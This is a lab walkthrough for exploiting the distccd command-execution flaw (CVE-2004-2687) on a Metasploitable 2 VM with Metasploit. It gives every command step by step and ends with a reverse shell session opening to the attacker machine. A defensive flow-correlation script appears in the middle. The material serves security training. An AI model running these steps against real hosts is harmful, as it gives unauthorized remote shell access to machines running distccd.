# distCC RCE \[CVE-2004-2687]

**Note**: these labs are strongly results-oriented and use step-by-step guidance. As you progress, try to find more information and understand what you are doing.

## Requirements

| Requirement          | Description                                                                                                             |
| -------------------- | ----------------------------------------------------------------------------------------------------------------------- |
| Kali Linux           | The Kali Linux VM (or any other type of installation)                                                                   |
| Metasploitable 2     | The Metasploitable 2 VM                                                                                                 |
| Metasploit Framework | Metasploit Framework toolset (installed on Kali Linux by default)                                                       |
| Metasploitable 2 IP  | The IP address of the Metasploitable 2 VM. In my case it is 192.168.8.142. This may be different in your specific case. |
| Kali Linux IP        | The IP address of the Kali Linux machine. In my case it is 192.168.8.147. This may be different in your specific case.  |

## Laboratory Workflow

The following sections describe the steps to be carried out during the laboratory. You may introduce variations on these steps and learn from them.

#### 1. Launch the Metasploit Framework

`msfconsole`

#### 2. Search for the appropriate module

`search distcc`

```
Matching Modules
================

   #  Name                           Disclosure Date  Rank       Check  Description
   -  ----                           ---------------  ----       -----  -----------
   0  exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution
```

#### 3. Use the module

`use exploit/unix/misc/distcc_exec`

#### 4. Check the module options

`options`

```
Module options (exploit/unix/misc/distcc_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   3632             yes       The target port (TCP)

Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.8.147    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target
```

#### 5. Set the appropriate options

`set RHOSTS 192.168.8.142`

```
RHOSTS => 192.168.8.142
```

#### 6. Show possible payloads

`show payloads`

```
Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   1   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2   payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   3   payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   4   payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   5   payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   6   payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   7   payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   8   payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   9   payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   10  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   11  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
```

#### 7. Select the payload

`set PAYLOAD payload/cmd/unix/reverse`

```
PAYLOAD => cmd/unix/reverse
```

#### 8. Show options for payload

`show options`

```
Module options (exploit/unix/misc/distcc_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.8.142    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   3632             yes       The target port (TCP)

Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.8.147    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target
```

#### 9. Fill the options for the payload

`set LHOST 192.168.8.147`

```
LHOST => 192.168.8.147
```

#### 10. Run the exploit

`exploit`

```
[*] Started reverse TCP double handler on 192.168.8.147:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo TkKLJgAeCRqAgdiV;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "TkKLJgAeCRqAgdiV\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.8.147:4444 -> 192.168.8.142:55458) at 2023-03-28 09:42:26 -0400
```
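Seen from the defender's side, the session above leaves a recognisable network pattern: a connection to the distccd port (3632) followed within a second by the server connecting back to the same peer (192.168.8.142:55458 -> 192.168.8.147:4444). The sketch below is an added example, not part of the original lab or of Metasploit, that correlates those two events in flow records. The record format, the 30-second window and the trusted client 192.168.8.10 are assumptions made for illustration.

```python
"""Flag hosts that accept a connection on the distccd port and then call back
to the same peer shortly afterwards (the pattern visible in the session above).
Flow records below are constructed sample data, not captured traffic."""
from datetime import datetime, timedelta

DISTCC_PORT = 3632              # RPORT shown in the module options
WINDOW = timedelta(seconds=30)  # assumed correlation window

# Constructed records: timestamp, src ip, src port, dst ip, dst port
SAMPLE_FLOWS = """\
2023-03-28T09:40:02 192.168.8.10 51122 192.168.8.142 3632
2023-03-28T09:42:25 192.168.8.147 40112 192.168.8.142 3632
2023-03-28T09:42:26 192.168.8.142 55458 192.168.8.147 4444
2023-03-28T09:50:00 192.168.8.142 40000 192.168.8.20 443
"""

def parse_flows(text):
    """Parse whitespace-separated flow records into time-ordered tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, sport, dst, dport = line.split()
        flows.append((datetime.fromisoformat(ts), src, int(sport), dst, int(dport)))
    return sorted(flows)

def find_callbacks(flows, trusted_clients=frozenset()):
    """Return alerts for untrusted distcc clients and for server callbacks."""
    alerts = []
    recent = {}  # (server, client) -> time of last inbound distcc connection
    for ts, src, sport, dst, dport in flows:
        if dport == DISTCC_PORT:
            recent[(dst, src)] = ts
            if src not in trusted_clients:
                alerts.append(("untrusted-distcc-client", ts, src, dst, dport))
            continue
        # A distcc server returns results on the client's own connection,
        # so a new outbound connection to that client is anomalous.
        seen = recent.get((src, dst))
        if seen is not None and ts - seen <= WINDOW:
            alerts.append(("callback-after-distcc", ts, src, dst, dport))
    return alerts

if __name__ == "__main__":
    for alert in find_callbacks(parse_flows(SAMPLE_FLOWS), {"192.168.8.10"}):
        print(alert)
```
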

## Video

Video that summarizes everything in this laboratory.

![](https://1253238579-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfPBLecZWemt5xh9AWf0x%2Fuploads%2Fgit-blob-2b9d4aebedad78826dc62d20c0e59bfe7205aba5%2Fdistcc.gif?alt=media)

## Questions

Now that you have completed this exploitation, try to answer the following:

1. Now, what can I do with the exploitation achieved?
2. Which type of privileges do I have on the exploited target?
3. How was this accomplished?
4. Try to learn more about this vulnerability.
